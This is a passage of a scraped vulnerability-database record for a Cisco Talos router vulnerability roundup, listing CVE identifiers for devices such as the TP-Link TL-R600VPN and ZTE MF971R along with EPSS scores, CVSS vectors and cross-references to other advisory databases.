\n\nCVE-2018-3951\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0619](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>)\n\n| \n\nCVE-2018-3950\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0618](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>)\n\n| \n\nCVE-2018-3949\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0617](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>)\n\n| \n\nCVE-2018-3948\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2021-1321](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1321>)\n\n| \n\nCVE-2021-21749\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1320](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1320>)\n\n| \n\nCVE-2021-21748\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1319](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1319>)\n\n| \n\nCVE-2021-21747\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1318](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1318>)\n\n| \n\nCVE-2021-21746\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1317](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1317>)\n\n| \n\nCVE-2021-21745\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1316](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1316>)\n\n| \n\nCVE-2021-21744\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1313](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1313>)\n\n| \n\nCVE-2021-21743\n\n| \n\nZTE MF971R", "published": "2023-08-02T12:00:19", "modified": "2023-08-02T12:00:19", "epss": [{"cve": "CVE-2018-3948", "epss": 0.00098, "percentile": 0.3973, "modified": "2023-06-23"}, {"cve": "CVE-2018-3949", "epss": 0.20956, "percentile": 0.95704, "modified": "2023-06-23"}, {"cve": "CVE-2018-3950", "epss": 0.00642, "percentile": 0.76336, "modified": "2023-06-23"}, {"cve": "CVE-2018-3951", "epss": 0.00152, "percentile": 0.50277, "modified": "2023-06-23"}, {"cve": "CVE-2018-3953", "epss": 0.00271, "percentile": 0.63237, "modified": "2023-06-23"}, {"cve": "CVE-2018-3955", "epss": 0.00301, "percentile": 0.6521, "modified": "2023-06-23"}, {"cve": "CVE-2018-4061", "epss": 0.0041, "percentile": 0.70239, "modified": "2023-06-23"}, {"cve": "CVE-2018-4062", "epss": 0.13942, "percentile": 0.94872, "modified": "2023-06-23"}, {"cve": "CVE-2018-4063", "epss": 0.00503, "percentile": 0.73119, "modified": "2023-06-23"}, {"cve": "CVE-2018-4064", "epss": 0.00237, "percentile": 0.60543, "modified": "2023-06-23"}, {"cve": "CVE-2018-4065", "epss": 0.00205, "percentile": 0.57262, "modified": "2023-06-23"}, {"cve": "CVE-2018-4066", "epss": 0.42165, "percentile": 0.96805, "modified": "2023-06-23"}, {"cve": "CVE-2018-4067", "epss": 0.00068, "percentile": 0.28093, "modified": "2023-06-23"}, {"cve": "CVE-2018-4068", "epss": 0.00084, "percentile": 0.34379, "modified": "2023-06-23"}, {"cve": "CVE-2018-4069", "epss": 0.00202, "percentile": 0.569, "modified": "2023-06-23"}, {"cve": "CVE-2018-4070", "epss": 0.09898, "percentile": 0.94002, "modified": "2023-06-23"}, {"cve": "CVE-2018-4071", "epss": 0.09898, "percentile": 0.94002, "modified": "2023-06-23"}, {"cve": "CVE-2018-4072", "epss": 0.07768, "percentile": 0.93261, "modified": "2023-06-23"}, {"cve": "CVE-2018-4073", "epss": 0.07768, "percentile": 0.93261, "modified": "2023-06-23"}, {"cve": "CVE-2019-11823", "epss": 0.00146, "percentile": 0.49417, "modified": "2023-06-13"}, {"cve": "CVE-2019-5016", "epss": 0.00421, "percentile": 0.70579, "modified": "2023-06-13"}, {"cve": "CVE-2019-5017", "epss": 0.00109, "percentile": 0.42582, "modified": "2023-06-13"}, {"cve": "CVE-2019-5101", "epss": 0.00107, "percentile": 0.42603, "modified": "2023-07-20"}, {"cve": "CVE-2019-5102", "epss": 0.00107, "percentile": 0.42603, "modified": "2023-07-20"}, {"cve": "CVE-2020-11117", "epss": 0.00652, "percentile": 0.765, "modified": "2023-06-06"}, {"cve": "CVE-2020-27648", "epss": 0.00086, "percentile": 0.35139, "modified": "2023-06-06"}, {"cve": "CVE-2020-27649", "epss": 0.00086, "percentile": 0.35139, "modified": "2023-06-06"}, {"cve": "CVE-2020-27650", "epss": 0.00116, "percentile": 0.44272, "modified": "2023-06-06"}, {"cve": "CVE-2020-27651", "epss": 0.00169, "percentile": 0.52648, "modified": "2023-06-06"}, {"cve": "CVE-2020-27652", "epss": 0.00112, "percentile": 0.43373, "modified": "2023-06-06"}, {"cve": "CVE-2020-27653", "epss": 0.00112, "percentile": 0.43373, "modified": "2023-06-06"}, {"cve": "CVE-2020-27654", "epss": 0.01319, "percentile": 0.84031, "modified": "2023-06-06"}, {"cve": "CVE-2020-27655", "epss": 0.0015, "percentile": 0.49896, "modified": "2023-06-06"}, {"cve": "CVE-2020-27656", "epss": 0.0007, "percentile": 0.28516, "modified": "2023-06-06"}, {"cve": "CVE-2020-27657", "epss": 0.0012, "percentile": 0.44976, "modified": "2023-06-06"}, {"cve": "CVE-2020-27658", "epss": 0.00171, "percentile": 0.52843, "modified": "2023-06-06"}, {"cve": "CVE-2020-27659", "epss": 0.00077, "percentile": 0.31411, "modified": "2023-06-06"}, {"cve": "CVE-2020-27660", "epss": 0.00165, "percentile": 0.51866, "modified": "2023-06-06"}, {"cve": "CVE-2021-21743", "epss": 0.00156, "percentile": 0.50721, "modified": "2023-05-27"}, {"cve": "CVE-2021-21744", "epss": 0.00073, "percentile": 0.30122, "modified": "2023-05-27"}, {"cve": "CVE-2021-21745", "epss": 0.46046, "percentile": 0.96866, "modified": "2023-05-27"}, {"cve": "CVE-2021-21746", "epss": 0.00072, "percentile": 0.29582, "modified": "2023-05-27"}, {"cve": "CVE-2021-21747", "epss": 0.00072, "percentile": 0.29582, "modified": "2023-05-27"}, {"cve": "CVE-2021-21748", "epss": 0.00293, "percentile": 0.64636, "modified": "2023-05-27"}, {"cve": "CVE-2021-21749", "epss": 0.00293, "percentile": 0.64636, "modified": "2023-05-27"}, {"cve": "CVE-2021-21816", "epss": 0.00337, "percentile": 0.67047, "modified": "2023-05-27"}, {"cve": "CVE-2021-21817", "epss": 0.00193, "percentile": 0.55716, "modified": "2023-05-27"}, {"cve": "CVE-2021-21818", "epss": 0.00086, "percentile": 0.35054, "modified": "2023-05-27"}, {"cve": "CVE-2021-21819", "epss": 0.00141, "percentile": 0.48543, "modified": "2023-05-27"}, {"cve": "CVE-2021-21820", "epss": 0.00355, "percentile": 0.67887, "modified": "2023-05-27"}, {"cve": "CVE-2021-21913", "epss": 0.00285, "percentile": 0.64036, "modified": "2023-05-27"}, {"cve": "CVE-2022-21178", "epss": 0.00105, "percentile": 0.41674, "modified": "2023-06-17"}, {"cve": "CVE-2022-21182", "epss": 0.00074, "percentile": 0.30652, "modified": "2023-08-01"}, {"cve": "CVE-2022-21201", "epss": 0.00108, "percentile": 0.42515, "modified": "2023-06-17"}, {"cve": "CVE-2022-21238", "epss": 0.00142, "percentile": 0.48871, "modified": "2023-06-17"}, {"cve": "CVE-2022-21809", "epss": 0.0006, "percentile": 0.23361, "modified": "2023-06-14"}, {"cve": "CVE-2022-22140", "epss": 0.00105, "percentile": 0.41649, "modified": "2023-06-14"}, {"cve": "CVE-2022-22144", "epss": 0.00106, "percentile": 0.41987, "modified": "2023-06-14"}, {"cve": "CVE-2022-23103", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23399", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23918", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23919", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-24005", "epss": 0.00087, "percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-24029", "epss": 0.00087, "percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-24910", "epss": 0.00083, "percentile": 0.34169, "modified": "2023-06-14"}, {"cve": "CVE-2022-25172", "epss": 0.00065, "percentile": 0.26738, "modified": "2023-06-25"}, {"cve": "CVE-2022-25932", "epss": 0.00091, "percentile": 0.37833, "modified": "2023-06-14"}, {"cve": "CVE-2022-25995", "epss": 0.00139, "percentile": 0.48217, "modified": "2023-06-14"}, {"cve": "CVE-2022-25996", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-26002", "epss": 0.0029, "percentile": 0.64534, "modified": "2023-06-14"}, {"cve": "CVE-2022-26007", "epss": 0.00162, "percentile": 0.51715, "modified": "2023-06-14"}, {"cve": "CVE-2022-26009", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-26020", "epss": 0.00067, "percentile": 0.27836, "modified": "2023-07-19"}, {"cve": "CVE-2022-26023", "epss": 0.00045, "percentile": 0.12457, "modified": "2023-06-14"}, {"cve": "CVE-2022-26042", "epss": 0.00162, "percentile": 0.51715, "modified": "2023-06-14"}, {"cve": "CVE-2022-26075", "epss": 0.00287, "percentile": 0.64284, "modified": "2023-06-14"}, {"cve": "CVE-2022-26085", "epss": 0.00968, "percentile": 0.81163, "modified": "2023-06-14"}, {"cve": "CVE-2022-26342", "epss": 0.00087, "percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-26346", "epss": 0.00106, "percentile": 0.41987, "modified": "2023-06-14"}, {"cve": "CVE-2022-26376", "epss": 0.00106, "percentile": 0.41876, "modified": "2023-06-14"}, {"cve": "CVE-2022-26420", "epss": 0.00287, "percentile": 0.64284, "modified": "2023-06-14"}, {"cve": "CVE-2022-26510", "epss": 0.00049, "percentile": 0.16302, "modified": "2023-06-03"}, {"cve": "CVE-2022-26518", "epss": 0.00258, "percentile": 0.62163, "modified": "2023-06-03"}, {"cve": "CVE-2022-26780", "epss": 0.00233, "percentile": 0.60059, "modified": "2023-06-03"}, {"cve": "CVE-2022-26782", "epss": 0.00259, "percentile": 0.62686, "modified": "2023-07-19"}, {"cve": "CVE-2022-27172", "epss": 0.00114, "percentile": 0.4377, "modified": "2023-06-03"}, {"cve": "CVE-2022-27178", "epss": 0.00106, "percentile": 0.41931, "modified": "2023-06-03"}, {"cve": "CVE-2022-27185", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-27630", "epss": 0.00084, "percentile": 0.34389, "modified": "2023-06-03"}, {"cve": "CVE-2022-27631", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-27633", "epss": 0.00077, "percentile": 0.3171, "modified": "2023-06-03"}, {"cve": "CVE-2022-27660", "epss": 0.00065, "percentile": 0.26637, "modified": "2023-06-03"}, {"cve": "CVE-2022-28127", "epss": 0.00094, "percentile": 0.3902, "modified": "2023-07-19"}, {"cve": "CVE-2022-28664", "epss": 0.00097, "percentile": 0.39509, "modified": "2023-06-03"}, {"cve": "CVE-2022-28665", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-28689", "epss": 0.0005, "percentile": 0.16856, "modified": "2023-06-03"}, {"cve": "CVE-2022-29481", "epss": 0.00045, "percentile": 0.12458, "modified": "2023-06-03"}, {"cve": "CVE-2022-29888", "epss": 0.00045, "percentile": 0.12439, "modified": "2023-06-03"}, {"cve": "CVE-2022-30543", "epss": 0.0005, "percentile": 0.16856, "modified": "2023-06-03"}, {"cve": "CVE-2022-32585", "epss": 0.00167, "percentile": 0.52184, "modified": "2023-06-03"}, {"cve": "CVE-2022-32765", "epss": 0.00168, "percentile": 0.52522, "modified": "2023-06-03"}, {"cve": "CVE-2022-33150", "epss": 0.00105, "percentile": 0.41588, "modified": "2023-06-03"}, {"cve": "CVE-2022-33312", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33314", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33325", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33329", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33897", "epss": 0.00058, "percentile": 0.22051, "modified": "2023-06-03"}, {"cve": "CVE-2022-34845", "epss": 0.00045, "percentile": 0.11954, "modified": "2023-06-03"}, {"cve": "CVE-2022-34850", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-35261", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-35271", "epss": 0.00046, "percentile": 0.12751, "modified": "2023-06-03"}, {"cve": "CVE-2022-35401", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-36279", "epss": 0.0008, "percentile": 0.32916, "modified": "2023-06-03"}, {"cve": "CVE-2022-36429", "epss": 0.00054, "percentile": 0.19714, "modified": "2023-06-03"}, {"cve": "CVE-2022-37337", "epss": 0.00059, "percentile": 0.23062, "modified": "2023-06-03"}, {"cve": "CVE-2022-38066", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-38088", "epss": 0.00068, "percentile": 0.28083, "modified": "2023-06-03"}, {"cve": "CVE-2022-38105", "epss": 0.00084, "percentile": 0.34389, "modified": "2023-06-03"}, {"cve": "CVE-2022-38393", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-38451", "epss": 0.00125, "percentile": 0.4573, "modified": "2023-06-03"}, {"cve": "CVE-2022-38452", "epss": 0.00054, "percentile": 0.19681, "modified": "2023-06-03"}, {"cve": "CVE-2022-38458", "epss": 0.00082, "percentile": 0.33757, "modified": "2023-06-03"}, {"cve": "CVE-2022-38459", "epss": 0.0008, "percentile": 0.32916, "modified": "2023-06-03"}, {"cve": "CVE-2022-38715", "epss": 0.00082, "percentile": 0.33579, "modified": "2023-06-03"}, {"cve": "CVE-2022-39045", "epss": 0.0007, "percentile": 0.28616, "modified": "2023-06-03"}, {"cve": "CVE-2022-40220", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-40222", "epss": 0.00105, "percentile": 0.41588, "modified": "2023-06-03"}, {"cve": "CVE-2022-40701", "epss": 0.00063, "percentile": 0.25166, "modified": "2023-06-03"}, {"cve": "CVE-2022-40969", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-40985", "epss": 0.00131, "percentile": 0.4676, "modified": "2023-06-03"}, {"cve": "CVE-2022-41030", "epss": 0.00113, "percentile": 0.43701, "modified": "2023-06-03"}, {"cve": "CVE-2022-41154", "epss": 0.0008, "percentile": 0.32903, "modified": "2023-06-03"}, {"cve": "CVE-2022-41991", "epss": 0.00081, "percentile": 0.33151, "modified": "2023-06-03"}, {"cve": "CVE-2022-42484", "epss": 0.00122, "percentile": 0.45297, "modified": "2023-06-03"}, {"cve": "CVE-2022-42490", "epss": 0.00143, "percentile": 0.48848, "modified": "2023-06-03"}, {"cve": "CVE-2022-42493", "epss": 0.00143, "percentile": 0.48848, "modified": "2023-06-03"}, {"cve": "CVE-2023-22299", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-22306", "epss": 0.00075, "percentile": 0.30893, "modified": "2023-07-23"}, {"cve": "CVE-2023-22319", "epss": 0.00076, "percentile": 0.31529, "modified": "2023-07-23"}, {"cve": "CVE-2023-22365", "epss": 0.00063, "percentile": 0.25247, "modified": "2023-07-23"}, {"cve": "CVE-2023-22371", "epss": 0.0013, "percentile": 0.47069, "modified": "2023-07-23"}, {"cve": "CVE-2023-22653", "epss": 0.00083, "percentile": 0.34271, "modified": "2023-08-06"}, {"cve": "CVE-2023-22659", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-22844", "epss": 0.00106, "percentile": 0.42306, "modified": "2023-07-23"}, {"cve": "CVE-2023-23546", "epss": 0.00104, "percentile": 0.41726, "modified": "2023-07-23"}, {"cve": "CVE-2023-23547", "epss": 0.0005, "percentile": 0.16443, "modified": "2023-07-23"}, {"cve": "CVE-2023-23550", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-23571", "epss": 0.00046, "percentile": 0.14054, "modified": "2023-07-25"}, {"cve": "CVE-2023-23902", "epss": 0.00202, "percentile": 0.57268, "modified": "2023-07-23"}, {"cve": "CVE-2023-23907", "epss": 0.00087, "percentile": 0.35637, "modified": "2023-07-23"}, {"cve": "CVE-2023-24018", "epss": 0.00047, "percentile": 0.14308, "modified": "2023-08-06"}, {"cve": "CVE-2023-24019", "epss": 0.00087, "percentile": 0.36243, "modified": "2023-08-06"}, {"cve": "CVE-2023-24496", "epss": 0.00044, "percentile": 0.10781, "modified": "2023-07-25"}, {"cve": "CVE-2023-24497", "epss": 0.00044, "percentile": 0.10781, "modified": "2023-07-25"}, {"cve": "CVE-2023-24519", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-24520", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-24582", "epss": 0.00107, "percentile": 0.42712, "modified": "2023-07-23"}, {"cve": "CVE-2023-24583", "epss": 0.00121, "percentile": 0.45535, "modified": "2023-07-23"}, {"cve": "CVE-2023-24595", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-25081", "epss": 0.00053, "percentile": 0.19336, "modified": "2023-08-06"}, {"cve": "CVE-2023-25124", "epss": 0.00053, "percentile": 0.19336, "modified": "2023-08-06"}, {"cve": "CVE-2023-25582", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-25583", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.talosintelligence.com/router-researcher-vulnerability-spotlight-23/", "reporter": "Cisco Talos", "references": [], "cvelist": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951", "CVE-2018-3953", "CVE-2018-3955", "CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2019-11823", "CVE-2019-5016", "CVE-2019-5017", "CVE-2019-5101", "CVE-2019-5102", "CVE-2020-11117", "CVE-2020-27648", "CVE-2020-27649", "CVE-2020-27650", "CVE-2020-27651", "CVE-2020-27652", "CVE-2020-27653", "CVE-2020-27654", "CVE-2020-27655", "CVE-2020-27656", "CVE-2020-27657", "CVE-2020-27658", "CVE-2020-27659", "CVE-2020-27660", "CVE-2021-21743", "CVE-2021-21744", "CVE-2021-21745", "CVE-2021-21746", "CVE-2021-21747", "CVE-2021-21748", "CVE-2021-21749", "CVE-2021-21816", "CVE-2021-21817", "CVE-2021-21818", "CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913", "CVE-2022-21178", "CVE-2022-21182", "CVE-2022-21201", "CVE-2022-21238", "CVE-2022-21809", "CVE-2022-22140", "CVE-2022-22144", "CVE-2022-23103", "CVE-2022-23399", "CVE-2022-23918", "CVE-2022-23919", "CVE-2022-24005", "CVE-2022-24029", "CVE-2022-24910", "CVE-2022-25172", "CVE-2022-25932", "CVE-2022-25995", "CVE-2022-25996", "CVE-2022-26002", "CVE-2022-26007", "CVE-2022-26009", "CVE-2022-26020", "CVE-2022-26023", "CVE-2022-26042", "CVE-2022-26075", "CVE-2022-26085", "CVE-2022-26342", "CVE-2022-26346", "CVE-2022-26376", "CVE-2022-26420", "CVE-2022-26510", "CVE-2022-26518", "CVE-2022-26780", "CVE-2022-26782", "CVE-2022-27172", "CVE-2022-27178", "CVE-2022-27185", "CVE-2022-27630", "CVE-2022-27631", "CVE-2022-27633", "CVE-2022-27660", "CVE-2022-28127", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-33897", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271", "CVE-2022-35401", "CVE-2022-36279", "CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38105", "CVE-2022-38393", "CVE-2022-38451", "CVE-2022-38452", "CVE-2022-38458", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493", "CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"], "immutableFields": [], "lastseen": "2023-08-06T21:25:55", "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:4F819DF0-ED81-4B04-B5DD-F17BE53CA6B6", "AKB:6F5BF822-55B4-4EEA-AC56-1A4AA236453A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1671", "CPAI-2018-1073", "CPAI-2018-1098", "CPAI-2019-0673", "CPAI-2019-0674", "CPAI-2019-0675", "CPAI-2020-3466"]}, {"type": "cnvd", "idList": ["CNVD-2021-53335", "CNVD-2021-53338", "CNVD-2021-53340", "CNVD-2021-53341", "CNVD-2021-92819", "CNVD-2021-92820", "CNVD-2021-92821", "CNVD-2021-92822", "CNVD-2021-92823", "CNVD-2021-92824", "CNVD-2021-92825", "CNVD-2021-94832", "CNVD-2022-59174", "CNVD-2022-59175", "CNVD-2022-59176", "CNVD-2022-59177", "CNVD-2022-59178", "CNVD-2022-59179", "CNVD-2022-59180", "CNVD-2022-59181", "CNVD-2022-59182", "CNVD-2022-59183", "CNVD-2022-59184", "CNVD-2022-59185", "CNVD-2022-59186", "CNVD-2022-59188", "CNVD-2022-59189", "CNVD-2022-59190", "CNVD-2022-59191", "CNVD-2022-59192", "CNVD-2022-82013", "CNVD-2022-82014", "CNVD-2022-82015", "CNVD-2022-82016", "CNVD-2022-82017", "CNVD-2022-82018", "CNVD-2022-82020", "CNVD-2022-82021", "CNVD-2022-82022", "CNVD-2022-82023", "CNVD-2023-15940", "CNVD-2023-15941", "CNVD-2023-17064", "CNVD-2023-17065", "CNVD-2023-17073", "CNVD-2023-17074", "CNVD-2023-17075", "CNVD-2023-17076", "CNVD-2023-17077", "CNVD-2023-17078", "CNVD-2023-17079", "CNVD-2023-17080", "CNVD-2023-17082", "CNVD-2023-17083", "CNVD-2023-17084", "CNVD-2023-17093"]}, {"type": "cve", "idList": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951", "CVE-2018-3953", "CVE-2018-3955", "CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2019-11823", "CVE-2019-5016", "CVE-2019-5017", "CVE-2019-5101", "CVE-2019-5102", "CVE-2020-11117", "CVE-2020-27648", "CVE-2020-27649", "CVE-2020-27650", "CVE-2020-27651", "CVE-2020-27652", "CVE-2020-27653", "CVE-2020-27654", "CVE-2020-27655", "CVE-2020-27656", "CVE-2020-27657", "CVE-2020-27658", "CVE-2020-27659", "CVE-2020-27660", "CVE-2021-21743", "CVE-2021-21744", "CVE-2021-21745", "CVE-2021-21746", "CVE-2021-21747", "CVE-2021-21748", "CVE-2021-21749", "CVE-2021-21816", "CVE-2021-21817", "CVE-2021-21818", "CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913", "CVE-2022-21178", "CVE-2022-21182", "CVE-2022-21201", "CVE-2022-21238", "CVE-2022-21809", "CVE-2022-22140", "CVE-2022-22144", "CVE-2022-23103", "CVE-2022-23399", "CVE-2022-23918", "CVE-2022-23919", "CVE-2022-24005", "CVE-2022-24029", "CVE-2022-24910", "CVE-2022-25172", "CVE-2022-25932", "CVE-2022-25995", "CVE-2022-25996", "CVE-2022-26002", "CVE-2022-26007", "CVE-2022-26009", "CVE-2022-26020", "CVE-2022-26023", "CVE-2022-26042", "CVE-2022-26075", "CVE-2022-26085", "CVE-2022-26342", "CVE-2022-26346", "CVE-2022-26376", "CVE-2022-26420", "CVE-2022-26510", "CVE-2022-26518", "CVE-2022-26780", "CVE-2022-26782", "CVE-2022-27172", "CVE-2022-27178", "CVE-2022-27185", "CVE-2022-27630", "CVE-2022-27631", "CVE-2022-27633", "CVE-2022-27660", "CVE-2022-28127", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-33897", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271", "CVE-2022-35401", "CVE-2022-36279", "CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38105", "CVE-2022-38393", "CVE-2022-38451", "CVE-2022-38452", "CVE-2022-38458", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493", "CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"]}, {"type": "ics", "idList": ["ICSA-19-122-03"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C4FF7781BBBB932203C69F488B232C0F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141621", "OPENVAS:1361412562310141702"]}, {"type": "openwrt", "idList": ["OPENWRT-SA-2019-11-05-3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152646", "PACKETSTORM:152647", "PACKETSTORM:152648", "PACKETSTORM:152649", "PACKETSTORM:152650", "PACKETSTORM:152651", "PACKETSTORM:152652", "PACKETSTORM:152653", "PACKETSTORM:152654", "PACKETSTORM:152655", "PACKETSTORM:152656"]}, {"type": "seebug", "idList": ["SSV:99311", "SSV:99312", "SSV:99313"]}, {"type": "talos", "idList": ["TALOS-2018-0617", "TALOS-2018-0618", "TALOS-2018-0619", "TALOS-2018-0620", "TALOS-2018-0625", "TALOS-2018-0746", "TALOS-2018-0747", "TALOS-2018-0748", "TALOS-2018-0749", "TALOS-2018-0750", "TALOS-2018-0751", "TALOS-2018-0752", "TALOS-2018-0753", "TALOS-2018-0754", "TALOS-2018-0755", "TALOS-2018-0756", "TALOS-2019-0775", "TALOS-2019-0776", 